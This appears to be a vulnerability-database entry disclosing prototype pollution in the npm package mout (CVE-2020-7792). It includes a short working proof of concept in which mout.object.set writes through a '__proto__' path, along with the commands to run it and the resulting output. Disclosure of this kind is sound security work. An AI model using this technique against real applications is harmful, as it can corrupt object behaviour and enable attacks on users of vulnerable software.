Lucene search
Ready-research1-NPM-MOUTHistoryDec 14, 2020 - 12:00 a.m.
Prototype Pollution in mout/mout
2020-12-1400:00:00
ready-research
www.huntr.dev
14
prototype pollution
mout
npm package
object
prototypes
EPSS
0.017
Percentile
88.0%
Description
mout is vulnerable to Prototype Pollution.
Proof of Concept
- Create the following PoC file:
// poc.js
var mout = require("mout")
var obj = {}
console.log("Before : " + {}.polluted);
mout.object.set(obj,'__proto__.polluted','Yes! Its Polluted');
console.log("After : " + {}.polluted);
- Execute the following commands in terminal:
npm i mout # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
Related
osv
osv
Prototype Pollution in mout
2022-02-09 22:49:10
Prototype Pollution in mout
2022-06-18 00:00:20
veracode
veracode
Prototype Pollution
2020-12-14 06:08:25
cvelist
cvelist
CVE-2020-7792 Prototype Pollution
2020-12-11 11:05:21
CVE-2022-21213 Prototype Pollution
2022-06-17 20:05:12
cve
cve
CVE-2020-7792
2020-12-11 11:15:11
CVE-2022-21213
2022-06-17 20:15:10
prion
prion
Design/Logic Flaw
2020-12-11 11:15:00
Design/Logic Flaw
2022-06-17 20:15:00
github
github
Prototype Pollution in mout
2022-02-09 22:49:10
Prototype Pollution in mout
2022-06-18 00:00:20
nvd
nvd
CVE-2020-7792
2020-12-11 11:15:11
CVE-2022-21213
2022-06-17 20:15:10